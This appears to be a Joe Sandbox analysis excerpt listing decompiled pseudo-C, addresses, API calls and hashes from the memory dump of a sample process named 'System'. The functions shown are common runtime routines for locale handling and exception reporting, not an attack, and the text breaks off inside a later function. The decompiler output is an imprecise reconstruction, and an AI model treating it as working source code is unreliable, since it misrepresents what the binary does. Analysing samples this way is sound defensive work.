                                                                                                                                                              0x7ff6e4c80fd5
                                                                                                                                                              0x7ff6e4c80fd5
                                                                                                                                                              0x7ff6e4c80fd9
                                                                                                                                                              0x7ff6e4c80fdd
                                                                                                                                                              0x7ff6e4c80fe4
                                                                                                                                                              0x7ff6e4c80fe9
                                                                                                                                                              0x7ff6e4c80ff5
                                                                                                                                                              0x7ff6e4c81004
                                                                                                                                                              0x7ff6e4c8100d
                                                                                                                                                              0x7ff6e4c8100f
                                                                                                                                                              0x7ff6e4c81014
                                                                                                                                                              0x7ff6e4c81016
                                                                                                                                                              0x7ff6e4c8101f
                                                                                                                                                              0x7ff6e4c81034
                                                                                                                                                              0x7ff6e4c8103a
                                                                                                                                                              0x7ff6e4c81043
                                                                                                                                                              0x7ff6e4c81045
                                                                                                                                                              0x7ff6e4c8104a
                                                                                                                                                              0x7ff6e4c8104c
                                                                                                                                                              0x7ff6e4c81051
                                                                                                                                                              0x7ff6e4c81053
                                                                                                                                                              0x7ff6e4c8105c
                                                                                                                                                              0x7ff6e4c8106d
                                                                                                                                                              0x7ff6e4c81073
                                                                                                                                                              0x7ff6e4c81075
                                                                                                                                                              0x7ff6e4c8107b
                                                                                                                                                              0x7ff6e4c81080
                                                                                                                                                              0x7ff6e4c81085
                                                                                                                                                              0x7ff6e4c81089
                                                                                                                                                              0x7ff6e4c81094
                                                                                                                                                              0x7ff6e4c8109d
                                                                                                                                                              0x7ff6e4c810a5
                                                                                                                                                              0x7ff6e4c810ae
                                                                                                                                                              0x7ff6e4c810b0
                                                                                                                                                              0x7ff6e4c810b6
                                                                                                                                                              0x7ff6e4c810c7
                                                                                                                                                              0x7ff6e4c810cb
                                                                                                                                                              0x7ff6e4c810d3
                                                                                                                                                              0x7ff6e4c810d5
                                                                                                                                                              0x7ff6e4c810e4
                                                                                                                                                              0x7ff6e4c810e5
                                                                                                                                                              0x7ff6e4c810e7
                                                                                                                                                              0x7ff6e4c810ed
                                                                                                                                                              0x7ff6e4c810ef
                                                                                                                                                              0x7ff6e4c81100
                                                                                                                                                              0x7ff6e4c81102
                                                                                                                                                              0x7ff6e4c81106
                                                                                                                                                              0x7ff6e4c81113
                                                                                                                                                              0x7ff6e4c81125
                                                                                                                                                              0x7ff6e4c81127
                                                                                                                                                              0x7ff6e4c8112b
                                                                                                                                                              0x7ff6e4c8113a
                                                                                                                                                              0x7ff6e4c8113b
                                                                                                                                                              0x7ff6e4c8113c
                                                                                                                                                              0x7ff6e4c81141
                                                                                                                                                              0x7ff6e4c81143
                                                                                                                                                              0x7ff6e4c81149
                                                                                                                                                              0x7ff6e4c81151
                                                                                                                                                              0x7ff6e4c81153
                                                                                                                                                              0x7ff6e4c8115f
                                                                                                                                                              0x7ff6e4c81163
                                                                                                                                                              0x7ff6e4c8116a
                                                                                                                                                              0x7ff6e4c8116c
                                                                                                                                                              0x7ff6e4c81179
                                                                                                                                                              0x7ff6e4c8117b
                                                                                                                                                              0x7ff6e4c8118f
                                                                                                                                                              0x7ff6e4c81196
                                                                                                                                                              0x7ff6e4c81198
                                                                                                                                                              0x7ff6e4c8119a
                                                                                                                                                              0x7ff6e4c811a5
                                                                                                                                                              0x7ff6e4c811a5
                                                                                                                                                              0x7ff6e4c811d5

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF6E4C75AC4: GetLastError.KERNEL32(?,?,?,00007FF6E4C68733,?,?,00000000,00007FF6E4C7C0EC), ref: 00007FF6E4C75AD3
                                                                                                                                                                • Part of subcall function 00007FF6E4C75AC4: SetLastError.KERNEL32(?,?,?,00007FF6E4C68733,?,?,00000000,00007FF6E4C7C0EC), ref: 00007FF6E4C75B71
                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF6E4C80FF5
                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF6E4C81030
                                                                                                                                                              • GetACP.KERNEL32(?,?,?,00000001,?,00007FF6E4C734A7), ref: 00007FF6E4C81075
                                                                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00007FF6E4C734A7), ref: 00007FF6E4C8109D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                              • String ID: utf8
                                                                                                                                                              • API String ID: 2136749100-905460609
                                                                                                                                                              • Opcode ID: d4e9d283735ff363d5a7310ba023d11618727ff18293d56b28c818d978fb0fcb
                                                                                                                                                              • Instruction ID: 3cc203e5f0a8634d1f9fe4242eb4cc0aa67ffae334aad691dbbb520f5a495e81
                                                                                                                                                              • Opcode Fuzzy Hash: d4e9d283735ff363d5a7310ba023d11618727ff18293d56b28c818d978fb0fcb
                                                                                                                                                              • Instruction Fuzzy Hash: C1916D2BA4878386EB609F31D8813B923B5AB48F80F444136DA4D87696DF3EF551C34A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C819BC Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00007FF67FF6E4C819BC(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r9) {
				signed int _v72;
				long long _v80;
				long long _v84;
				signed int _v88;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				int _t60;
				void* _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				signed long long _t93;
				signed long long _t94;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t99;
				intOrPtr* _t100;
				long long _t101;
				signed long long _t102;
				intOrPtr* _t103;
				void* _t105;
				intOrPtr* _t106;
				signed long long _t115;
				signed long long _t117;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr* _t143;
				void* _t144;
				signed long long _t145;
				void* _t148;
				void* _t155;
				long long _t156;
				intOrPtr* _t158;

				_t155 = __r9;
				_t129 = __rdx;
				_t67 = __edx;
				_t66 = __ecx;
				_t93 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t94 = _t93 ^ _t148 - 0x00000040;
				_v72 = _t94;
				_t143 = __r8;
				_t158 = __rdx;
				_t156 = __rcx;
				E00007FF67FF6E4C75AC4(_t94, _t105, __rdx, _t144);
				_t145 = _t94;
				_v88 = 0;
				_v80 = 0;
				E00007FF67FF6E4C75AC4(0, _t105, _t129, _t145);
				r12d = 0;
				_t5 = _t145 + 0xa0; // 0xa0
				_t106 = _t5;
				 *0x000003A0 =  &_v88;
				_t96 = _t156 + 0x80;
				 *((long long*)(_t145 + 0x98)) = _t156;
				 *_t106 = _t96;
				if (_t96 == 0) goto 0xe4c81a43;
				if ( *_t96 == r12w) goto 0xe4c81a43;
				_t130 =  *0xe4c9a680; // 0x17
				E00007FF67FF6E4C8193C(_t67, _t106, 0xe4c9a510, _t145, _t148, _t106);
				_v88 = r12d;
				_t97 =  *((intOrPtr*)(_t145 + 0x98));
				if (_t97 == 0) goto 0xe4c81acc;
				if ( *_t97 == r12w) goto 0xe4c81acc;
				_t98 =  *_t106;
				if (_t98 == 0) goto 0xe4c81a72;
				if ( *_t98 == r12w) goto 0xe4c81a72;
				E00007FF67FF6E4C812D4(_t66, _t67, _t98, _t106,  &_v88, _t130 - 1, _t106);
				goto 0xe4c81a7b;
				E00007FF67FF6E4C813A4(_t66, _t67, _t98, _t106,  &_v88, _t130 - 1, _t106);
				if (_v88 != r12d) goto 0xe4c81b42;
				_t132 =  *0xe4c9a500; // 0x41
				_t14 = _t145 + 0x98; // 0x98
				if (E00007FF67FF6E4C8193C(_t67, _t106, 0xe4c9a0f0, _t145, _t148, _t14) == 0) goto 0xe4c81b38;
				_t99 =  *_t106;
				if (_t99 == 0) goto 0xe4c81ac1;
				if ( *_t99 == r12w) goto 0xe4c81ac1;
				E00007FF67FF6E4C812D4(_t66, _t67, _t99, _t106,  &_v88, _t132 - 1, _t14);
				goto 0xe4c81b38;
				_t115 =  &_v88;
				E00007FF67FF6E4C813A4(_t66, _t67, _t99, _t106, _t115, _t132 - 1, _t14);
				goto 0xe4c81b38;
				_t100 =  *_t106;
				if (_t100 == 0) goto 0xe4c81b25;
				if ( *_t100 == r12w) goto 0xe4c81b25;
				E00007FF67FF6E4C75AC4(_t100, _t106, _t132 - 1, _t145);
				_t101 =  *((intOrPtr*)(_t100 + 0xa0));
				_t117 = (_t115 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t101 + _t117 * 2)) != r12w) goto 0xe4c81aed;
				 *((long long*)(_t100 + 0xb4)) = _t101;
				 *_t101 =  *_t101 + (r12d & 0xffffff00 | _t117 == 0x00000003);
				if ((_v88 & 0x00000004) != 0) goto 0xe4c81b38;
				_v88 = r12d;
				goto 0xe4c81b38;
				_v88 = 0x104;
				GetUserDefaultLCID();
				_v80 = _t101;
				_v84 = _t101;
				if (_v88 == r12d) goto 0xe4c81c1d;
				_t102 = _t156 + 0x100;
				asm("dec eax");
				E00007FF67FF6E4C817E0(_t106, 0x7ff6e4c811ec & _t102,  &_v88, _t145);
				if (_t102 == 0) goto 0xe4c81c1d;
				_t60 = IsValidCodePage(??);
				if (_t102 == 0) goto 0xe4c81c1d;
				 *_t102 =  *_t102 + _t60;
				if (_t102 == 0) goto 0xe4c81c1d;
				if (_t158 == 0) goto 0xe4c81b94;
				 *_t158 = _t65;
				_t36 = _t145 + 0x2f0; // 0x2f0
				r9d = 0;
				_t37 = _t155 + 0x55; // 0x55
				_t68 = _t37;
				r8d = _t68;
				E00007FF67FF6E4C77D5C(_t66, _t158, _t102, _t102, _t36, _t145, _t148);
				if (_t143 == 0) goto 0xe4c81c16;
				r9d = 0;
				r8d = _t68;
				_t62 = E00007FF67FF6E4C77D5C(_t66, _t143, _t102, _t102, _t143 + 0x120, _t145, _t148);
				_t103 = _t143;
				 *_t103 =  *_t103 + _t62;
				if (_t103 == 0) goto 0xe4c81c1d;
				r9d = _t68;
				 *_t103 =  *_t103 + _t62;
				if (_t103 == 0) goto 0xe4c81c1d;
				r9d = 0x4cce8b440000000a;
				r8d = 0x4cce8b4400000010;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C85B80(_t66), _t66, _v72 ^ _t148 - 0x00000040);
			}







































                                                                                                                                                              0x7ff6e4c819bc
                                                                                                                                                              0x7ff6e4c819bc
                                                                                                                                                              0x7ff6e4c819bc
                                                                                                                                                              0x7ff6e4c819bc
                                                                                                                                                              0x7ff6e4c819ce
                                                                                                                                                              0x7ff6e4c819d5
                                                                                                                                                              0x7ff6e4c819d8
                                                                                                                                                              0x7ff6e4c819dc
                                                                                                                                                              0x7ff6e4c819df
                                                                                                                                                              0x7ff6e4c819e2
                                                                                                                                                              0x7ff6e4c819e5
                                                                                                                                                              0x7ff6e4c819ea
                                                                                                                                                              0x7ff6e4c819ef
                                                                                                                                                              0x7ff6e4c819f3
                                                                                                                                                              0x7ff6e4c819f6
                                                                                                                                                              0x7ff6e4c819ff
                                                                                                                                                              0x7ff6e4c81a02
                                                                                                                                                              0x7ff6e4c81a02
                                                                                                                                                              0x7ff6e4c81a09
                                                                                                                                                              0x7ff6e4c81a10
                                                                                                                                                              0x7ff6e4c81a17
                                                                                                                                                              0x7ff6e4c81a1e
                                                                                                                                                              0x7ff6e4c81a24
                                                                                                                                                              0x7ff6e4c81a2a
                                                                                                                                                              0x7ff6e4c81a2c
                                                                                                                                                              0x7ff6e4c81a3e
                                                                                                                                                              0x7ff6e4c81a43
                                                                                                                                                              0x7ff6e4c81a47
                                                                                                                                                              0x7ff6e4c81a51
                                                                                                                                                              0x7ff6e4c81a57
                                                                                                                                                              0x7ff6e4c81a59
                                                                                                                                                              0x7ff6e4c81a5f
                                                                                                                                                              0x7ff6e4c81a65
                                                                                                                                                              0x7ff6e4c81a6b
                                                                                                                                                              0x7ff6e4c81a70
                                                                                                                                                              0x7ff6e4c81a76
                                                                                                                                                              0x7ff6e4c81a7f
                                                                                                                                                              0x7ff6e4c81a85
                                                                                                                                                              0x7ff6e4c81a8b
                                                                                                                                                              0x7ff6e4c81aa2
                                                                                                                                                              0x7ff6e4c81aa8
                                                                                                                                                              0x7ff6e4c81aae
                                                                                                                                                              0x7ff6e4c81ab4
                                                                                                                                                              0x7ff6e4c81aba
                                                                                                                                                              0x7ff6e4c81abf
                                                                                                                                                              0x7ff6e4c81ac1
                                                                                                                                                              0x7ff6e4c81ac5
                                                                                                                                                              0x7ff6e4c81aca
                                                                                                                                                              0x7ff6e4c81acc
                                                                                                                                                              0x7ff6e4c81ad2
                                                                                                                                                              0x7ff6e4c81ad8
                                                                                                                                                              0x7ff6e4c81ada
                                                                                                                                                              0x7ff6e4c81ae6
                                                                                                                                                              0x7ff6e4c81aed
                                                                                                                                                              0x7ff6e4c81af5
                                                                                                                                                              0x7ff6e4c81b08
                                                                                                                                                              0x7ff6e4c81b17
                                                                                                                                                              0x7ff6e4c81b1d
                                                                                                                                                              0x7ff6e4c81b1f
                                                                                                                                                              0x7ff6e4c81b23
                                                                                                                                                              0x7ff6e4c81b25
                                                                                                                                                              0x7ff6e4c81b2c
                                                                                                                                                              0x7ff6e4c81b32
                                                                                                                                                              0x7ff6e4c81b35
                                                                                                                                                              0x7ff6e4c81b3c
                                                                                                                                                              0x7ff6e4c81b42
                                                                                                                                                              0x7ff6e4c81b50
                                                                                                                                                              0x7ff6e4c81b56
                                                                                                                                                              0x7ff6e4c81b5f
                                                                                                                                                              0x7ff6e4c81b68
                                                                                                                                                              0x7ff6e4c81b70
                                                                                                                                                              0x7ff6e4c81b82
                                                                                                                                                              0x7ff6e4c81b86
                                                                                                                                                              0x7ff6e4c81b8f
                                                                                                                                                              0x7ff6e4c81b91
                                                                                                                                                              0x7ff6e4c81b97
                                                                                                                                                              0x7ff6e4c81b9e
                                                                                                                                                              0x7ff6e4c81ba1
                                                                                                                                                              0x7ff6e4c81ba1
                                                                                                                                                              0x7ff6e4c81ba5
                                                                                                                                                              0x7ff6e4c81ba8
                                                                                                                                                              0x7ff6e4c81bb0
                                                                                                                                                              0x7ff6e4c81bbc
                                                                                                                                                              0x7ff6e4c81bbf
                                                                                                                                                              0x7ff6e4c81bc2
                                                                                                                                                              0x7ff6e4c81bd3
                                                                                                                                                              0x7ff6e4c81bde
                                                                                                                                                              0x7ff6e4c81be2
                                                                                                                                                              0x7ff6e4c81bee
                                                                                                                                                              0x7ff6e4c81bfa
                                                                                                                                                              0x7ff6e4c81bfe
                                                                                                                                                              0x7ff6e4c81c09
                                                                                                                                                              0x7ff6e4c81c0d
                                                                                                                                                              0x7ff6e4c81c39

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3939093798-0
                                                                                                                                                              • Opcode ID: 81792cfdd5c6017bd08685b748b5eb0f964261015482bae4459a710d5a8cdd12
                                                                                                                                                              • Instruction ID: 5a83d62696b610150a3fa160491cef053d12c3429ddd3deec2a4940879df43f8
                                                                                                                                                              • Opcode Fuzzy Hash: 81792cfdd5c6017bd08685b748b5eb0f964261015482bae4459a710d5a8cdd12
                                                                                                                                                              • Instruction Fuzzy Hash: 3B71476BB886938AEB109B71D4843F923F0AF48F44F484137CA1D97695EE3EB445C35A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C62F58 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                              			E00007FF67FF6E4C62F58(void* __ecx, intOrPtr* __rax, long long __rbx) {
				void* _t33;
				void* _t35;
				long _t39;
				signed int _t41;
				void* _t44;
				intOrPtr* _t50;
				long long _t54;
				long long _t56;
				struct _EXCEPTION_POINTERS** _t61;
				void* _t75;
				_Unknown_base(*)()* _t79;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t50 = __rax;
				 *((long long*)(_t82 + 8)) = __rbx;
				_t80 = _t82 - 0x4c0;
				_t83 = _t82 - 0x5c0;
				if (__rax == 0) goto 0xe4c62f82;
				asm("int 0x29");
				asm("ror byte [eax-0x73], cl");
				asm("dec ebp");
				_t35 = E00007FF67FF6E4C64A30(_t33 +  *__rax, _t44, 0x3, _t75, _t85);
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t50 == 0) goto 0xe4c63002;
				 *(_t83 + 0x38) =  *(_t83 + 0x38) & 0x00000000;
				 *((long long*)(_t83 + 0x30)) = _t80 + 0x4e0;
				 *((long long*)(_t83 + 0x28)) = _t80 + 0x4e8;
				 *((long long*)(_t83 + 0x20)) = _t80 - 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t80 + 0xe8)) =  *((intOrPtr*)(_t80 + 0x4c8));
				r8d = 0x98;
				 *((long long*)(_t80 + 0x88)) = _t80 + 0x4d0;
				E00007FF67FF6E4C64A30(_t35, _t44, _t83 + 0x50, 0,  *((intOrPtr*)(_t80 + 0xe8)));
				_t54 =  *((intOrPtr*)(_t80 + 0x4c8));
				 *((long long*)(_t83 + 0x60)) = _t54;
				 *((long long*)(_t83 + 0x50)) = 0x40000015;
				 *((long long*)(_t83 + 0x54)) = 1;
				IsDebuggerPresent();
				 *((long long*)(_t83 + 0x40)) = _t83 + 0x50;
				_t56 = _t80 - 0x10;
				 *((long long*)(_t83 + 0x48)) = _t56;
				SetUnhandledExceptionFilter(_t79);
				_t39 = UnhandledExceptionFilter( *_t61);
				if (_t56 != 0) goto 0xe4c63092;
				if ((_t41 & 0xffffff00 | _t54 == 0x00000001) != 0) goto 0xe4c63092;
				return E00007FF67FF6E4C62F50(_t39);
			}


















                                                                                                                                                              0x7ff6e4c62f58
                                                                                                                                                              0x7ff6e4c62f58
                                                                                                                                                              0x7ff6e4c62f5e
                                                                                                                                                              0x7ff6e4c62f66
                                                                                                                                                              0x7ff6e4c62f7c
                                                                                                                                                              0x7ff6e4c62f80
                                                                                                                                                              0x7ff6e4c62f8d
                                                                                                                                                              0x7ff6e4c62f90
                                                                                                                                                              0x7ff6e4c62f98
                                                                                                                                                              0x7ff6e4c62fa1
                                                                                                                                                              0x7ff6e4c62fb8
                                                                                                                                                              0x7ff6e4c62fbb
                                                                                                                                                              0x7ff6e4c62fc4
                                                                                                                                                              0x7ff6e4c62fc6
                                                                                                                                                              0x7ff6e4c62fdd
                                                                                                                                                              0x7ff6e4c62fec
                                                                                                                                                              0x7ff6e4c62ff5
                                                                                                                                                              0x7ff6e4c62ffc
                                                                                                                                                              0x7ff6e4c6300e
                                                                                                                                                              0x7ff6e4c6301e
                                                                                                                                                              0x7ff6e4c63028
                                                                                                                                                              0x7ff6e4c6302f
                                                                                                                                                              0x7ff6e4c63034
                                                                                                                                                              0x7ff6e4c6303b
                                                                                                                                                              0x7ff6e4c63040
                                                                                                                                                              0x7ff6e4c63048
                                                                                                                                                              0x7ff6e4c63050
                                                                                                                                                              0x7ff6e4c6305e
                                                                                                                                                              0x7ff6e4c63063
                                                                                                                                                              0x7ff6e4c6306a
                                                                                                                                                              0x7ff6e4c63071
                                                                                                                                                              0x7ff6e4c6307c
                                                                                                                                                              0x7ff6e4c63084
                                                                                                                                                              0x7ff6e4c63088
                                                                                                                                                              0x7ff6e4c630a2

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                              • Opcode ID: 7442d96ed8be6e406ddb8735d64eb84307debff0f78059eaa60e81e56549abec
                                                                                                                                                              • Instruction ID: e090a4d76e2f87c7c4a7d70d45bcde6be5e4dfed3514d06030b36af4d1b3dd4a
                                                                                                                                                              • Opcode Fuzzy Hash: 7442d96ed8be6e406ddb8735d64eb84307debff0f78059eaa60e81e56549abec
                                                                                                                                                              • Instruction Fuzzy Hash: EC314D77658A8285EB609F70E8803FD7374FB84B48F44803ADA4E87A99DF39D548C719
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6A3C4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E00007FF67FF6E4C6A3C4(void* __ecx, void* __edx, long long __rbx, long long __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				void* _t38;
				long _t42;
				signed long long _t54;
				long long _t57;
				long long _t61;
				void* _t65;
				_Unknown_base(*)()* _t84;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t54 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t91 + 0x4e0) = _t54 ^ _t94;
				if (_t65 == 0xffffffff) goto 0xe4c6a403;
				_t37 = E00007FF67FF6E4C62F50(_t36);
				r8d = 0x98;
				_t38 = E00007FF67FF6E4C64A30(_t37, __edx, _t94 + 0x70, 0, __r8);
				r8d = 0x4d0;
				E00007FF67FF6E4C64A30(_t38, __edx, _t91 + 0x10, 0, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t57 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t57;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t57 == 0) goto 0xe4c6a496;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((long long*)(_t94 + 0x70)) = __rdx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				_t61 =  *((intOrPtr*)(_t91 + 0x508));
				 *((long long*)(_t91 - 0x80)) = _t61;
				 *(_t94 + 0x74) = _t84;
				IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t84, _t90);
				_t42 = UnhandledExceptionFilter(_t100);
				if (_t61 != 0) goto 0xe4c6a4f8;
				if (_t61 != 0) goto 0xe4c6a4f8;
				if (_t65 == 0xffffffff) goto 0xe4c6a4f8;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C62F50(_t42), __ecx,  *(_t91 + 0x4e0) ^ _t94);
			}

















                                                                                                                                                              0x7ff6e4c6a3c4
                                                                                                                                                              0x7ff6e4c6a3c9
                                                                                                                                                              0x7ff6e4c6a3d2
                                                                                                                                                              0x7ff6e4c6a3da
                                                                                                                                                              0x7ff6e4c6a3e1
                                                                                                                                                              0x7ff6e4c6a3eb
                                                                                                                                                              0x7ff6e4c6a3fc
                                                                                                                                                              0x7ff6e4c6a3fe
                                                                                                                                                              0x7ff6e4c6a40a
                                                                                                                                                              0x7ff6e4c6a410
                                                                                                                                                              0x7ff6e4c6a41b
                                                                                                                                                              0x7ff6e4c6a421
                                                                                                                                                              0x7ff6e4c6a42b
                                                                                                                                                              0x7ff6e4c6a434
                                                                                                                                                              0x7ff6e4c6a438
                                                                                                                                                              0x7ff6e4c6a43d
                                                                                                                                                              0x7ff6e4c6a452
                                                                                                                                                              0x7ff6e4c6a455
                                                                                                                                                              0x7ff6e4c6a45e
                                                                                                                                                              0x7ff6e4c6a460
                                                                                                                                                              0x7ff6e4c6a473
                                                                                                                                                              0x7ff6e4c6a480
                                                                                                                                                              0x7ff6e4c6a489
                                                                                                                                                              0x7ff6e4c6a490
                                                                                                                                                              0x7ff6e4c6a49d
                                                                                                                                                              0x7ff6e4c6a4af
                                                                                                                                                              0x7ff6e4c6a4b3
                                                                                                                                                              0x7ff6e4c6a4ba
                                                                                                                                                              0x7ff6e4c6a4c1
                                                                                                                                                              0x7ff6e4c6a4c5
                                                                                                                                                              0x7ff6e4c6a4c9
                                                                                                                                                              0x7ff6e4c6a4d3
                                                                                                                                                              0x7ff6e4c6a4de
                                                                                                                                                              0x7ff6e4c6a4e6
                                                                                                                                                              0x7ff6e4c6a4ea
                                                                                                                                                              0x7ff6e4c6a4ef
                                                                                                                                                              0x7ff6e4c6a51e

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                              • Opcode ID: 985d6daf95c8e6d1304e5a2ffc06a2274602506931b258a2808260a2f371a414
                                                                                                                                                              • Instruction ID: 345711c9d25da8ed9ce3977a2b2a137fae27d31f98acae27a41570ed3b835f83
                                                                                                                                                              • Opcode Fuzzy Hash: 985d6daf95c8e6d1304e5a2ffc06a2274602506931b258a2808260a2f371a414
                                                                                                                                                              • Instruction Fuzzy Hash: 23316E37658B8286DB208B35E8803BE73B0FB89B58F505136EA9D83B59DF39D145CB05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C75EF4 Relevance: 7.8, APIs: 5, Instructions: 325fileCOMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E00007FF67FF6E4C75EF4(void* __eax, signed int __edx, void* __esi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, signed char* __r8, void* __r10) {
				void* __rsi;
				void* __rbp;
				signed int _t157;
				void* _t165;
				signed int _t166;
				signed int _t172;
				signed char _t177;
				signed int _t180;
				signed long long _t215;
				long long _t220;
				signed long long _t222;
				long long _t227;
